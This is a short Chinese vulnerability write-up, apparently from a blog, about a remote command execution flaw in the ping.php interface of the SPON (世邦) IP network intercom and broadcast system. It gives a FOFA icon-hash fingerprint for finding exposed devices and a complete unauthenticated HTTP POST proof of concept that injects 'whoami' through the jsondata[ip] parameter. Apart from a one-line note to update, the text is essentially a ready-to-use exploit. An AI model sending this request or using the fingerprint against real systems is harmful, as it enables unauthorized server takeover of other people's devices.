世邦 IP网络对讲广播系统 ping.php接口存在远程命令执行漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统ping.php接口存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行高危命令获取服务器权限。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc:

python 复制代码
POST /php/ping.php HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

jsondata%5Btype%5D=123&jsondata%5Bip%5D=whoami

执行whoami命令

修复建议

联系软件厂商更新至最新安全版本

相关推荐
DjangoJason7 分钟前
计算机网络 : 数据链路层
网络·计算机网络
白总Server1 小时前
GaussDB 分布式数据库调优(架构到全链路优化)
java·网络·c++·架构·go·scala·数据库架构
XiaoCCCcCCccCcccC1 小时前
传输层协议 TCP 介绍 -- TCP协议格式,确认应答机制,超时重传机制,连接管理机制,滑动窗口,流量控制,拥塞控制,延迟应答,捎带应答
网络·网络协议·tcp/ip
亿坊电商1 小时前
如何安全高效地维护CMS智能插件?
安全·cms插件
Q_Q5110082852 小时前
python+django/flask成都奥科厨具厂产品在线销售系统
vue.js·spring boot·python·django·flask·node.js·php
我言秋日胜春朝★2 小时前
【Linux网络编程】基于udp套接字实现的网络通信
linux·网络·udp
Starshime2 小时前
PHP、Apache环境中部署sqli-labs
网络安全
搬码临时工3 小时前
域名访问内网网站知多少?通过自定义域名访问本地Web 服务
服务器·网络·tcp/ip
摘取一颗天上星️3 小时前
端到端记忆网络 vs 神经图灵机:外部记忆的两种哲学之争
网络·人工智能·深度学习·机器学习·lstm·外部记忆
白熊1884 小时前
【推荐算法】注意力机制与兴趣演化:推荐系统如何抓住用户的心?
算法·php·推荐算法